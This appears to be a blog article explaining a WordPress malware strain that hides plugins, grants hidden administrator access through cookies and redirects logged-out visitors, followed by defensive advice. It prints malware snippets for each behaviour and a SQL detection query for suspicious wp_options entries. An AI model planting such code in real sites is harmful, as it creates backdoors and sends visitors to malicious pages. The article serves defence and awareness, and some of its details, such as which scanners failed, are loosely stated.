WordPress, a leading content management system (CMS), powers over 40% of all websites on the internet. This vast reach has unfortunately made it a frequent target for cyberattacks, including malware. Recently, a new type of malware infection in WordPress installations has come to light, slipping past major security scanners and compromising websites through hidden admin users, redirecting non-logged-in users, and tampering with core settings. This article breaks down the technical details of this malware, its impact, and provides simple explanations of jargon to make it more accessible for everyone.
The Emergence of the WordPress Malware
WordPress users and developers often rely on security plugins and services like Wordfence, iThemes Security, and All-In-One WP Security & Firewall to detect malicious activities and keep their websites safe. Despite these tools, reports from security-conscious WordPress site administrators revealed that a sophisticated type of malware has been able to bypass many major security scanners and hide within the core database of infected WordPress websites.
What’s alarming about this malware is that it uses advanced techniques to hide itself from the site’s admin and security plugins, as well as create hidden administrative accounts without the knowledge of the legitimate site owner.
What Makes This Malware So Dangerous?
The malware exploits weak passwords and security vulnerabilities in plugins to inject malicious code directly into the WordPress database. The infected websites redirect visitors (who aren’t logged in) to malicious external URLs. Moreover, it creates hidden admin users, effectively granting the attackers ongoing control over the site.
Several developers and website administrators have voiced concerns about this new strain of malware on forums like Reddit, providing insights and warnings for the larger WordPress community. A recent Reddit thread, titled “Malware WordPress Installations: Hidden Admin Users, Redirects, Plugin Hiding Detected (14 Major Scanners),” highlights the malware’s stealthy nature, going undetected even by some of the best-known security plugins.
Admin Panel Hijacking
In this attack, the malware modifies the admin interface—the control panel that WordPress site owners use to manage their sites. It hides specific security-related plugins, such as “Code Snippets,” preventing the admin from reviewing compromised plugins or seeing critical security notifications.
Below is a sample of the malicious code that hides security plugins:
if (current_user_can('administrator') && !array_key_exists('show_all', $some_array)) {
add_action('admin_print_scripts', function () {
echo '#toplevel_page_wpcode { display: none; }';
echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
echo '#wpcode-notice-global-review_request { display: none; }';
});
add_filter('all_plugins', function ($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});
}
This snippet effectively hides the “Code Snippets” plugin from the WordPress dashboard, keeping site owners unaware of the malware’s presence.
Creation of Hidden Admin Users
One of the most dangerous aspects of this malware is its ability to create hidden admin users without the site owner’s knowledge. By reading cookie data and injecting admin credentials directly into the database, the attackers can create new admin users who can log into the site and continue the attack without raising suspicion.
Here’s an example of the malicious code that creates hidden admin users:
if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
switch (_gcookie('c')) {
case 'admin':
$user->set_role('administrator');
break;
}
}
This code checks for certain cookie data, and if it matches the attackers’ criteria, it gives an unknown user administrator privileges on the website. Once in place, the attacker can manipulate the site further, create more admin accounts, or inject even more malicious code.
Redirecting Non-Logged-In Users
Another feature of the malware is its ability to redirect non-logged-in visitors (users who aren’t signed into the WordPress admin panel) to external malicious websites. The malware uses IP address tracking to avoid redirecting the same IP address multiple times within a 24-hour period. This makes the attack more covert, as some users may visit the website and never encounter a redirect, while others may unknowingly end up on harmful websites.
Here’s an example of the redirect code used in this malware:
if (!is_user_logged_in()) {
$ip = _user_ip();
$redirect_url = base64_decode($s[0]['txt']);
if (substr($redirect_url, 0, 4) === 'http') {
header("Location: $redirect_url");
exit;
}
}
This code decodes the malicious URL from a database entry and redirects non-logged-in users to the external site. The attackers can use this redirection to deliver malware, phishing attacks, or other harmful content.
Hidden Database Entries
What makes this malware especially tricky to detect is its ability to hide malicious code within normal WordPress database entries. The malware injects code into the wp_options
table, specifically targeting fields like wpcode_snippets
, siteurl
, and redirection_options
. These fields are typically used for legitimate WordPress functions, so most security scanners overlook them.
By injecting malicious code into these entries, the malware can execute harmful actions without raising alarms in traditional file scans. Here’s an SQL query that can help identify suspicious patterns in the database:
SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('siteurl', 'wpcode_snippets', 'wpseo', 'redirection_options')
AND (
option_value LIKE '%<script%'
OR option_value LIKE '%eval%'
OR option_value LIKE '%base64_decode%'
OR option_value LIKE '%document.write%'
);
This query searches for common indicators of malware, such as <script>
tags, eval()
functions, and base64_decode()
calls, all of which are commonly used by attackers to hide malicious scripts in the database.
Why Are So Many Security Plugins Failing?
A major concern expressed by many users is the fact that this malware can evade detection by even the most popular security plugins. According to the Reddit post, the following scanners failed to detect the malware:
- iThemes Security
- All-In-One WP Security & Firewall
- Anti-Malware Security and Brute-Force Firewall (GOTMLS.NET)
- Quttera Web Malware Scanner
- Exploit Scanner
- WP Cerber Security
Even though these scanners have a reputation for being thorough, they weren’t able to flag the malicious code injected into the WordPress database. This has raised questions about the effectiveness of these tools and whether they need to improve their scanning methods to detect such sophisticated attacks.
A Word About Security Plugins
Security plugins like Wordfence and iThemes Security are designed to help protect your site by detecting vulnerabilities, scanning for malware, and blocking suspicious activities. However, these tools typically focus on scanning files for known malware signatures or unusual behavior.
In this case, the malware doesn’t alter the core WordPress files directly but instead injects malicious code into the database, which is much harder to detect. The malware also uses legitimate WordPress functions like wp_insert_user()
and standard database queries to hide itself, which allows it to fly under the radar of traditional security scans.
How the Malware Works: A Step-by-Step Breakdown
Let’s break down how this malware infects a WordPress site in more detail:
1. Initial Compromise
The attackers exploit weak passwords or unpatched vulnerabilities in WordPress plugins to gain unauthorized access to the site. Once they have admin-level access, they begin their attack.
2. Hidden Admin Users
The malware creates hidden admin users by injecting malicious code into the WordPress database. These users don’t show up in the admin panel but have full control over the site.
3. Tampering with the Admin Interface
The malware then hides security plugins or notifications in the WordPress admin panel to prevent the site owner from noticing the infection. It uses code like the one mentioned earlier to hide plugins like “Code Snippets.”
4. Redirecting Visitors
Next, the malware injects malicious code into the database to redirect non-logged-in visitors to external, harmful websites. This redirection doesn’t affect logged-in users, making it harder for site owners to detect.
5. Evasion of Security Scans
Since the malware injects code into the WordPress database and uses legitimate functions, it evades traditional file-based security scans. Most security plugins focus on scanning files for malware, not database entries.
6. Persistence
The malware ensures persistence by keeping hidden admin users active, allowing the attackers to regain access to the site even if some of their malicious code is removed. They can continue to update their malware or install new types of malicious software on the site.
Combating the Malware: What Can You Do?
If you manage a WordPress website, it’s crucial to take action to secure your site against this type of malware. Here are some steps you can take:
1. Use Strong Passwords
One of the most common ways attackers gain access to WordPress sites is by exploiting weak passwords. Make sure all admin accounts use strong, unique passwords, and consider enabling two-factor authentication (2FA) for an additional layer of security.
2. Keep WordPress, Plugins, and Themes Updated
Outdated plugins, themes, or WordPress core files can contain vulnerabilities that attackers exploit. Always keep your WordPress installation, themes, and plugins up to date to patch any security flaws.
3. Scan Your Database
Most WordPress security plugins focus on file scans, but this malware hides in the database. Regularly scan your database for suspicious entries, especially in the wp_options
table. You can use the SQL query mentioned earlier to search for malware patterns.
4. Monitor Admin Users
Keep an eye on your admin user accounts. If you notice any new or suspicious users, investigate immediately. A plugin like Activity Log can help track admin activity on your site.
5. Check for Plugin Tampering
If your security plugins disappear from the WordPress admin panel, it could be a sign of malware. Manually check the wp-content/plugins
directory to ensure that all security plugins are still present and haven’t been tampered with.
6. Use More Advanced Security Tools
While popular security plugins like Wordfence and iThemes Security are a good starting point, consider using more advanced tools like MalCare or SecuPress, which are designed to detect more sophisticated malware and provide deeper scans.
7. Back Up Regularly
In case of an attack, having a recent backup of your website can be a lifesaver. Make sure you’re regularly backing up both your site files and your database. Plugins like UpdraftPlus or BackupBuddy can automate this process for you.
Security Plugin Developers: A Call for Improved Detection
As malware continues to evolve, security plugin developers must step up and improve their detection methods. Current tools focus too heavily on scanning files and often overlook potential threats hiding in the WordPress database. To combat these advanced attacks, security plugins should:
- Implement deeper database scanning for common malware injection patterns.
- Monitor unusual admin activity, such as the creation of hidden admin users.
- Provide site owners with tools to detect and remove suspicious plugin behavior.
In response to this malware, developers of tools like SecuPress have already begun working on updates to better protect against this type of attack. However, it’s crucial that all major security tools improve their ability to detect malicious database entries and hidden users.
Conclusion: Staying Safe in a Dangerous Digital Landscape
The malware currently plaguing WordPress installations is a reminder that attackers are constantly evolving their methods, finding new ways to infiltrate websites and evade detection. While security plugins remain an essential part of keeping your WordPress site safe, relying solely on these tools isn’t enough. Website owners must take proactive steps to secure their sites by using strong passwords, keeping software up to date, and regularly scanning their databases for suspicious activity.
By staying vigilant, monitoring admin activity, and using advanced security tools, you can protect your WordPress site from this new wave of malware and ensure that your visitors have a safe, secure experience.
In the ever-changing world of cybersecurity, knowledge is power. The more you know about the threats facing your website, the better equipped you are to defend against them. Keep learning, stay updated, and remember: a secure website is a successful website.